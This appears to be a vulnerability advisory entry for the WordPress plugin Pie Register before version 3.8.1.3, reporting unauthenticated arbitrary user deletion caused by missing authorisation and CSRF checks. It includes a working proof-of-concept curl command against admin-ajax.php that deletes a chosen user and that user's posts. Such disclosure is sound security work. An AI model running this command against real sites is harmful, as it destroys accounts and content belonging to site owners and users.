Lucene search

K
wpexploitCydaveWPEX-ID:A087FB45-6F6C-40AC-B48B-2CBCEDA86CBE
HistoryNov 28, 2022 - 12:00 a.m.

Pie Register < 3.8.1.3 - Unauthenticated Arbitrary User Deletion

2022-11-2800:00:00
cydave
289
pie register
unauthenticated
arbitrary user deletion
curl
security exploit

EPSS

0.001

Percentile

40.2%

The plugin does not have authorisation and CSRF when deleting users via an init action handler, allowing unauthenticated attackers to delete arbitrary users (along with their posts)

Invoke the following curl command to delete the user (user id 2)

curl https://example.com/wp-admin/admin-ajax.php --data 'vdeleteit=1&vusers[]=2'

EPSS

0.001

Percentile

40.2%

Related for WPEX-ID:A087FB45-6F6C-40AC-B48B-2CBCEDA86CBE